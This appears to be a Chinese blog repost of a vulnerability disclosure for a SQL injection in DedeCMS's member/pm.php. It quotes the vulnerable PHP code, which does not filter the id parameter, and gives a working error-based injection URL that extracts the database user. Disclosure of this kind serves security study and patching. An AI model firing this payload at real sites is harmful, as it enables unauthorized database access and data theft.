member pm.php,Dedecms 会员中心注入漏洞5

客官°小女子只卖身不卖艺 2023-01-18 11:22 198阅读 0赞

漏洞作者: Matt

[php]member/pm.php

else if($dopost==’read’)

{

$sql = “SELECT * FROM `#@__member_friends` WHERE mid=’{$cfg_ml->M_ID}‘ AND ftype!=’-1’ ORDER BY addtime DESC LIMIT 20”;

$friends = array();

$dsql->SetQuery($sql);

$dsql->Execute();

while ($row = $dsql->GetArray()) {

$friends[] = $row;

}

$row = $dsql->GetOne(“SELECT * FROM `#@__member_pms` WHERE id=’$id’ AND (fromid=’{$cfg_ml->M_ID}‘ OR toid=’{$cfg_ml->M_ID}‘)”);//ID没过滤

if(!is_array($row))

{

ShowMsg(‘对不起,你指定的消息不存在或你没权限查看!’,’-1’);

exit();

}

$dsql->ExecuteNoneQuery(“UPDATE `#@__member_pms` SET hasview=1 WHERE id=’$id’ AND folder=’inbox’ AND toid=’{$cfg_ml->M_ID}‘“);

$dsql->ExecuteNoneQuery(“UPDATE `#@__member_pms` SET hasview=1 WHERE folder=’outbox’ AND toid=’{$cfg_ml->M_ID}‘“);

include_once(dirname(__FILE__).’/templets/pm-read.htm’);

exit();

}

[/php]

漏洞证明:

测试方法http://127.0.0.1/dede/member/pm.php?dopost=read&id=1‘ and @`‘` and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) and ‘1’=’1

b296a6522ced9a84ecddaae5eb7b8cf4.png

发表评论

表情:
评论列表 (有 0 条评论,198人围观)

还没有评论,来说两句吧...

相关阅读

    相关 JDBC的SQL注入漏洞

    在实现某些业务时,许多SQL语句中的参数都需要通过变量拼接而成,而这些参数大多都是通过用户输入而来,这样就存在了用户恶意输入SQL关键字来影响JDBC中SQL语句的查询。 例

    相关 CRLF注入漏洞

    01 漏洞描述 在《[HTTP | HTTP报文][HTTP _ HTTP]》一文中,我们介绍了HTTP报文的结构:状态行和首部中的每行以CRLF结束,首部与主体之间由一空行